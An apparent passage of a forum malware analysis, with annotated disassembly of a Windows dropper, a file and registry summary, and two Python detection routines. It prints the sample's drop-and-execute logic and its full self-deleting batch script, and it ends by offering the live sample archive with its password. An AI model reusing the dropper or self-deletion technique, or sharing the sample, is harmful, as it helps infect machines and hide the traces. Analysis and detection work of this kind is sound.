004032E8 |. FF15 50504000  CALL DWORD PTR DS:[<&KERNEL32.OutputDebu>; \OutputDebugStringA
004032EE |. 8D85 FCFEFFFF  LEA EAX,DWORD PTR SS:[EBP-104]
004032F4 |. 6A 05          PUSH 5                                   ; /ShowState = SW_SHOW
004032F6 |. 50             PUSH EAX                                 ; |CmdLine
004032F7 |. FF15 58504000  CALL DWORD PTR DS:[<&KERNEL32.WinExec>]  ; \WinExec  // at this point a new rundll32.exe process appears, running the DLL's InstallMyDll export
004032FD |. C9             LEAVE
004032FE \. C3             RETN
Code:
00401077 /$ 55             PUSH EBP
00401078 |. 8BEC           MOV EBP,ESP
0040107A |. 81EC 04010000  SUB ESP,104
00401080 |. 8D85 FCFEFFFF  LEA EAX,DWORD PTR SS:[EBP-104]
00401086 |. 68 04010000    PUSH 104                                 ; /BufSize = 104 (260.)
0040108B |. 50             PUSH EAX                                 ; |Buffer
0040108C |. FF15 4C504000  CALL DWORD PTR DS:[<&KERNEL32.GetWindows>; \GetWindowsDirectoryA
00401092 |. 8D85 FCFEFFFF  LEA EAX,DWORD PTR SS:[EBP-104]
00401098 |. 68 30004100    PUSH 复件_123.00410030                   ; /src = "\system32\"
0040109D |. 50             PUSH EAX                                 ; |dest
0040109E |. E8 35050000    CALL <JMP.&MSVCRT.strcat>                ; \strcat
004010A3 |. 8D85 FCFEFFFF  LEA EAX,DWORD PTR SS:[EBP-104]
004010A9 |. 68 24004100    PUSH 复件_123.00410024                   ; /src = "xxggyu.exe"  (a fixed string constant, unlike the DLL names, so this name does not change between runs)
004010AE |. 50             PUSH EAX                                 ; |dest
004010AF |. E8 24050000    CALL <JMP.&MSVCRT.strcat>                ; \strcat  -> "<windir>\system32\xxggyu.exe"
004010B4 |. 8D85 FCFEFFFF  LEA EAX,DWORD PTR SS:[EBP-104]
004010BA |. 50             PUSH EAX
004010BB |. E8 E3010000    CALL 复件_123.004012A3                   ; same check as in the DLL routines
004010C0 |. 83C4 14        ADD ESP,14
004010C3 |. 85C0           TEST EAX,EAX
004010C5 |. 75 1A          JNZ SHORT 复件_123.004010E1
004010C7 |. 8D85 FCFEFFFF  LEA EAX,DWORD PTR SS:[EBP-104]
004010CD |. 50             PUSH EAX                                 ; /String
004010CE |. FF15 50504000  CALL DWORD PTR DS:[<&KERNEL32.OutputDebu>; \OutputDebugStringA
004010D4 |. 8D85 FCFEFFFF  LEA EAX,DWORD PTR SS:[EBP-104]
004010DA |. 50             PUSH EAX
004010DB |. E8 20FFFFFF    CALL 复件_123.00401000                   ; drop routine for xxggyu.exe, only when 004012A3 returned 0
004010E0 |. 59             POP ECX
004010E1 |> 68 C8000000    PUSH 0C8                                 ; /Timeout = 200. ms
004010E6 |. FF15 54504000  CALL DWORD PTR DS:[<&KERNEL32.Sleep>]    ; \Sleep  (lets the write settle before executing the file)
004010EC |. 8D85 FCFEFFFF  LEA EAX,DWORD PTR SS:[EBP-104]
004010F2 |. 6A 01          PUSH 1                                   ; /ShowState = SW_SHOWNORMAL
004010F4 |. 50             PUSH EAX                                 ; |CmdLine
004010F5 |. FF15 58504000  CALL DWORD PTR DS:[<&KERNEL32.WinExec>]  ; \WinExec  // launches the dropped payload %SystemRoot%\system32\xxggyu.exe
004010FB |. C9             LEAVE
004010FC \. C3             RETN
Code:
004040A4 /$ 55             PUSH EBP
004040A5 |. 8BEC           MOV EBP,ESP
004040A7 |. 81EC 14090000  SUB ESP,914                              ; 0x104-byte path buffer at [EBP-114], 0x800-byte script buffer at [EBP-914]
004040AD |. 53             PUSH EBX
004040AE |. 56             PUSH ESI
004040AF |. 57             PUSH EDI
004040B0 |. 6A 40          PUSH 40
004040B2 |. 33DB           XOR EBX,EBX                              ; EBX = 0, reused as NULL/FALSE argument below
004040B4 |. 59             POP ECX
004040B5 |. 33C0           XOR EAX,EAX
004040B7 |. 8DBD EDFEFFFF  LEA EDI,DWORD PTR SS:[EBP-113]
004040BD |. 889D ECFEFFFF  MOV BYTE PTR SS:[EBP-114],BL
004040C3 |. 889D ECF6FFFF  MOV BYTE PTR SS:[EBP-914],BL
004040C9 |. F3:AB          REP STOS DWORD PTR ES:[EDI]              ; zero the path buffer
004040CB |. 66:AB          STOS WORD PTR ES:[EDI]
004040CD |. AA             STOS BYTE PTR ES:[EDI]
004040CE |. B9 FF010000    MOV ECX,1FF
004040D3 |. 33C0           XOR EAX,EAX
004040D5 |. 8DBD EDF6FFFF  LEA EDI,DWORD PTR SS:[EBP-913]
004040DB |. BE D4E24300    MOV ESI,复件_123.0043E2D4                ; ASCII "375O540.bat"
004040E0 |. F3:AB          REP STOS DWORD PTR ES:[EDI]              ; zero the 0x800-byte script buffer
004040E2 |. 66:AB          STOS WORD PTR ES:[EDI]
004040E4 |. AA             STOS BYTE PTR ES:[EDI]
004040E5 |. 8D7D F4        LEA EDI,DWORD PTR SS:[EBP-C]
004040E8 |. 8D85 ECFEFFFF  LEA EAX,DWORD PTR SS:[EBP-114]
004040EE |. A5             MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ES>; copy "375O540.bat" (12 bytes) into [EBP-C]
004040EF |. A5             MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ES>
004040F0 |. 68 04010000    PUSH 104                                 ; /BufSize = 104 (260.)
004040F5 |. 50             PUSH EAX                                 ; |PathBuffer
004040F6 |. 53             PUSH EBX                                 ; |hModule => NULL
004040F7 |. A5             MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ES>; |
004040F8 |. FF15 28504000  CALL DWORD PTR DS:[<&KERNEL32.GetModuleF>; \GetModuleFileNameA  (own full path, used in the @del line later)
004040FE |. 8D85 ECF6FFFF  LEA EAX,DWORD PTR SS:[EBP-914]
00404104 |. 68 C8E24300    PUSH 复件_123.0043E2C8                   ; /String2 = "@echo off"
00404109 |. 50             PUSH EAX                                 ; |String1
0040410A |. FF15 40504000  CALL DWORD PTR DS:[<&KERNEL32.lstrcpyA>] ; \lstrcpyA
00404110 |. 8B35 3C504000  MOV ESI,DWORD PTR DS:[<&KERNEL32.lstrcat>; kernel32.lstrcatA
00404116 |. 6A 0A          PUSH 0A
00404118 |. 5F             POP EDI                                  ; EDI = 10 = loop counter
00404119 |> 8D85 ECF6FFFF  /LEA EAX,DWORD PTR SS:[EBP-914]
0040411F |. 68 ACE24300    |PUSH 复件_123.0043E2AC                  ; ASCII "@echo 375O540>>575.aqq"  (appended 10 times; a crude delay before the deletes)
00404124 |. 50             |PUSH EAX
00404125 |. FFD6           |CALL ESI
00404127 |. 4F             |DEC EDI
00404128 |.^ 75 EF         \JNZ SHORT 复件_123.00404119
0040412A |. 8D85 ECF6FFFF  LEA EAX,DWORD PTR SS:[EBP-914]
00404130 |. 68 9CE24300    PUSH 复件_123.0043E29C                   ; ASCII "@del 575.aqq"
00404135 |. 50             PUSH EAX
00404136 |. FFD6           CALL ESI
00404138 |. 8D85 ECF6FFFF  LEA EAX,DWORD PTR SS:[EBP-914]
0040413E |. 68 94E24300    PUSH 复件_123.0043E294                   ; ASCII "@del ""
00404143 |. 50             PUSH EAX
00404144 |. FFD6           CALL ESI
00404146 |. 8D85 ECFEFFFF  LEA EAX,DWORD PTR SS:[EBP-114]           ; own module path from GetModuleFileNameA
0040414C |. 50             PUSH EAX
0040414D |. 8D85 ECF6FFFF  LEA EAX,DWORD PTR SS:[EBP-914]
00404153 |. 50             PUSH EAX
00404154 |. FFD6           CALL ESI
00404156 |. 8D85 ECF6FFFF  LEA EAX,DWORD PTR SS:[EBP-914]
0040415C |. 68 90E24300    PUSH 复件_123.0043E290                   ; ASCII """
00404161 |. 50             PUSH EAX
00404162 |. FFD6           CALL ESI                                 ; -> @del "<own exe path>"
00404164 |. 8D85 ECF6FFFF  LEA EAX,DWORD PTR SS:[EBP-914]
0040416A |. 68 88E24300    PUSH 复件_123.0043E288                   ; ASCII "@del "
0040416F |. 50             PUSH EAX
00404170 |. FFD6           CALL ESI
00404172 |. 8D45 F4        LEA EAX,DWORD PTR SS:[EBP-C]             ; "375O540.bat"
00404175 |. 50             PUSH EAX
00404176 |. 8D85 ECF6FFFF  LEA EAX,DWORD PTR SS:[EBP-914]
0040417C |. 50             PUSH EAX
0040417D |. FFD6           CALL ESI                                 ; -> @del 375O540.bat  (the script deletes itself)
0040417F |. 8D85 ECF6FFFF  LEA EAX,DWORD PTR SS:[EBP-914]
00404185 |. 68 80E24300    PUSH 复件_123.0043E280                   ; ASCII "@exit"
0040418A |. 50             PUSH EAX
0040418B |. FFD6           CALL ESI
0040418D |. 53             PUSH EBX                                 ; /hTemplateFile
0040418E |. 53             PUSH EBX                                 ; |Attributes
0040418F |. 6A 02          PUSH 2                                   ; |Mode = CREATE_ALWAYS
00404191 |. 53             PUSH EBX                                 ; |pSecurity
00404192 |. 53             PUSH EBX                                 ; |ShareMode
00404193 |. 8D45 F4        LEA EAX,DWORD PTR SS:[EBP-C]             ; |
00404196 |. 68 00000040    PUSH 40000000                            ; |Access = GENERIC_WRITE
0040419B |. 50             PUSH EAX                                 ; |FileName = "375O540.bat" (relative path, i.e. the current directory)
0040419C |. FF15 5C504000  CALL DWORD PTR DS:[<&KERNEL32.CreateFile>; \CreateFileA
004041A2 |. 8BF0           MOV ESI,EAX
004041A4 |. 8D45 F0        LEA EAX,DWORD PTR SS:[EBP-10]
004041A7 |. 53             PUSH EBX                                 ; /pOverlapped
004041A8 |. 50             PUSH EAX                                 ; |pBytesWritten
004041A9 |. 8D85 ECF6FFFF  LEA EAX,DWORD PTR SS:[EBP-914]           ; |
004041AF |. 68 00080000    PUSH 800                                 ; |nBytesToWrite = 800 (2048.)  (whole buffer: the .bat is NUL-padded after "@exit")
004041B4 |. 50             PUSH EAX                                 ; |Buffer
004041B5 |. 56             PUSH ESI                                 ; |hFile
004041B6 |. FF15 68504000  CALL DWORD PTR DS:[<&KERNEL32.WriteFile>>; \WriteFile
004041BC |. 56             PUSH ESI                                 ; /hObject
004041BD |. FF15 60504000  CALL DWORD PTR DS:[<&KERNEL32.CloseHandl>; \CloseHandle
004041C3 |. 8D45 F4        LEA EAX,DWORD PTR SS:[EBP-C]
004041C6 |. 53             PUSH EBX                                 ; /ShowState = 0 (SW_HIDE)
004041C7 |. 50             PUSH EAX                                 ; |CmdLine = "375O540.bat"
004041C8 |. FF15 58504000  CALL DWORD PTR DS:[<&KERNEL32.WinExec>]  ; \WinExec
004041CE |. 53             PUSH EBX                                 ; /ExitCode
004041CF \. FF15 38504000  CALL DWORD PTR DS:[<&KERNEL32.ExitProces>; \ExitProcess  (exits at once so the batch can delete the image)
Code (the batch file as written by the routine above; the quoted path is wherever the sample was run from, here the author's desktop):
@echo off
@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
@del 575.aqq
@del "C:\Documents and Settings\Robey\桌面\新建文件夹\复件 123.exe"
@del 375O540.bat
@exit
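As an added example (not part of the original post and not the sample's code), the following Python routine recognises the self-deletion stub above when handed the text of a batch file: the run of redirected `@echo` lines (a crude delay so the parent process has exited before its image is deleted), a `@del` of a quoted executable path, and a `@del` of the batch file itself. The sample text is a constructed copy of the batch shown above; the function and field names are my own and not from the post.

```python
"""Recognise the self-deletion batch stub written by 004040A4 (added example)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Set

# Constructed copy of the batch file shown above; the quoted path is where
# the sample sat on the author's machine.
SAMPLE_BATCH = r"""@echo off
@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
@del 575.aqq
@del "C:\Documents and Settings\Robey\桌面\新建文件夹\复件 123.exe"
@del 375O540.bat
@exit
"""

# "@echo <anything>>>file": the padding/delay idiom.
ECHO_REDIRECT = re.compile(r"^@?echo\s+.*?>>\s*(\S+)\s*$", re.I)
# "@del [/switches] "quoted path"" or "@del [/switches] bare-path".
DEL_CMD = re.compile(r'^@?(?:del|erase)\s+(?:/\S+\s+)*(?:"([^"]+)"|(\S+))', re.I)
EXEC_SUFFIXES = (".exe", ".dll", ".scr", ".com")


@dataclass
class BatchFindings:
    echo_padding_lines: int = 0                       # count of "@echo X>>file" lines
    scratch_files: Set[str] = field(default_factory=set)   # files the echo lines append to
    deleted_paths: List[str] = field(default_factory=list) # every @del target, in order
    deletes_executable: bool = False                  # a @del of an .exe/.dll/.scr/.com
    deletes_self: bool = False                        # a @del of the batch file itself

    @property
    def is_self_delete_stub(self) -> bool:
        return self.deletes_executable and self.deletes_self


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_batch(text: str, batch_name: Optional[str] = None) -> BatchFindings:
    """Scan batch text line by line. If batch_name is not known, any deleted
    .bat file is treated as the script deleting itself."""
    findings = BatchFindings()
    for raw in text.splitlines():
        line = raw.strip()
        m = ECHO_REDIRECT.match(line)
        if m:
            findings.echo_padding_lines += 1
            findings.scratch_files.add(m.group(1).lower())
            continue
        m = DEL_CMD.match(line)
        if not m:
            continue
        target = m.group(1) or m.group(2)
        findings.deleted_paths.append(target)
        base = _basename(target)
        if base.endswith(EXEC_SUFFIXES):
            findings.deletes_executable = True
        elif base.endswith(".bat") and (batch_name is None or base == batch_name.lower()):
            findings.deletes_self = True
    return findings


if __name__ == "__main__":
    result = analyze_batch(SAMPLE_BATCH, "375O540.bat")
    print(f"padding lines: {result.echo_padding_lines}, scratch files: {sorted(result.scratch_files)}")
    print(f"deleted: {result.deleted_paths}")
    print(f"self-delete stub: {result.is_self_delete_stub}")
```

The two flags are kept separate on purpose: a batch that only deletes a scratch file is ordinary, and one that only deletes itself is common in installers; the combination of deleting an executable and then the script is what marks this stub.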
Summary:
1. Files created by the virus
The dropper randomises most of its file names: the DLLs it drops are named differently on every run, while the dropped payload keeps a fixed name. This matches the listings above: the DLL names are read from run-time globals (DS:[43E5E4], DS:[43E5E8]), whereas "xxggyu.exe" is a string constant at 00410024.
%SystemRoot%\system32\zrrs1.dll                 <-------|
%SystemRoot%\system32\dllcache\zrrs1.dll        <-------|-----> these three file names differ on every run
%SystemRoot%\system32\iksii.dll (the DLL flagged by AV)  <-------|
%SystemRoot%\system32\xxggyu.exe (the dropped payload)
D:\ssshall (attributes: read-only, hidden, system)
2. Registry keys modified by the virus
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} (the CLSID of the Internet Explorer desktop icon)
HKEY_LOCAL_MACHINE\SOFTWARE\Softfy
3. Behaviour
Adds an Internet Explorer icon to the desktop whose address is http://www.wz157.cn, writes registry entries and locks IE. Extracts files from its own body into the system directory and sets them read-only, hidden and system. Enumerates running processes looking for 360tray.exe and ravmond.exe (Rising), runs its DLL inside a rundll32.exe host (rundll32 zrrs1.dll , InstallMyDll) and keeps attempting outbound connections. Finally it writes a batch file, runs it and exits; the batch deletes the original executable and then itself.
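The chain in item 3 can be written down as a behavioural detection instead of a list of file names. The Python below is an added example, not code from the post: it walks a constructed list of process-creation events (Sysmon-style pid/ppid/image/cmdline fields) and reports any parent that spawns at least two of: regsvr32 /s on a DLL, rundll32 with a DLL,export pair, and a .bat handed to cmd.exe. It deliberately does not key on zrrs1.dll, iksii.dll or 375O540.bat, since item 1 says those names change between runs. Event contents, pids and paths are all constructed for the example.

```python
"""Behavioural detection for the dropper's execution chain (added example)."""
import re
from collections import defaultdict


def _tokens(cmdline):
    """Split a Windows command line, keeping quoted paths as one token."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_regsvr32_silent(image, cmdline):
    """regsvr32 /s <something>.dll: silent COM registration of a DLL."""
    toks = [t.lower() for t in _tokens(cmdline)]
    return (_basename(image) == "regsvr32.exe"
            and "/s" in toks
            and any(t.endswith(".dll") for t in toks))


def rule_rundll32_export(image, cmdline):
    """rundll32 <name>.dll , <Export>: code loaded into a rundll32 host."""
    return (_basename(image) == "rundll32.exe"
            and re.search(r"\.dll\s*,\s*\w+", cmdline, re.I) is not None)


def rule_batch_launched(image, cmdline):
    """A .bat given to the command interpreter (WinExec on a .bat ends up here)."""
    return (_basename(image) == "cmd.exe"
            and any(t.lower().endswith(".bat") for t in _tokens(cmdline)))


RULES = {
    "regsvr32_silent": rule_regsvr32_silent,
    "rundll32_export": rule_rundll32_export,
    "batch_launched": rule_batch_launched,
}


def tag_event(event):
    """Names of every rule the single event matches."""
    return [name for name, rule in RULES.items()
            if rule(event["image"], event["cmdline"])]


def find_dropper_chains(events, min_tags=2):
    """Group rule hits by parent pid; return parents with >= min_tags distinct hits.
    A lone rundll32 or regsvr32 is normal; the combination from one parent is not."""
    by_parent = defaultdict(set)
    for ev in events:
        for tag in tag_event(ev):
            by_parent[ev["ppid"]].add(tag)
    return {ppid: sorted(tags) for ppid, tags in by_parent.items()
            if len(tags) >= min_tags}


# Constructed events mirroring the summary; pid 1100 stands for the dropper.
EVENTS = [
    {"pid": 1100, "ppid": 700,  "image": r"C:\Temp\sample.exe",
     "cmdline": r"C:\Temp\sample.exe"},
    {"pid": 1200, "ppid": 1100, "image": r"C:\WINDOWS\system32\regsvr32.exe",
     "cmdline": r"regsvr32 /s C:\WINDOWS\System32\iksii.dll"},
    {"pid": 1300, "ppid": 1100, "image": r"C:\WINDOWS\system32\rundll32.exe",
     "cmdline": "rundll32 zrrs1.dll , InstallMyDll"},
    {"pid": 1400, "ppid": 1100, "image": r"C:\WINDOWS\system32\xxggyu.exe",
     "cmdline": r"C:\WINDOWS\system32\xxggyu.exe"},
    {"pid": 1500, "ppid": 1100, "image": r"C:\WINDOWS\system32\cmd.exe",
     "cmdline": "cmd.exe /c 375O540.bat"},
    # Benign: Explorer opening a Control Panel applet through rundll32.
    {"pid": 1600, "ppid": 800,  "image": r"C:\WINDOWS\system32\rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},
]


if __name__ == "__main__":
    for ppid, tags in find_dropper_chains(EVENTS).items():
        print(f"parent pid {ppid}: {', '.join(tags)}")
```

The dropped xxggyu.exe run (pid 1400) is intentionally not a rule: an executable launched from System32 cannot be told apart from legitimate ones without a baseline of that directory, so the correlation leans on the three command-line shapes the listings fix.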
Sample attachment: 病毒样本.rar (archive password: kill_virus)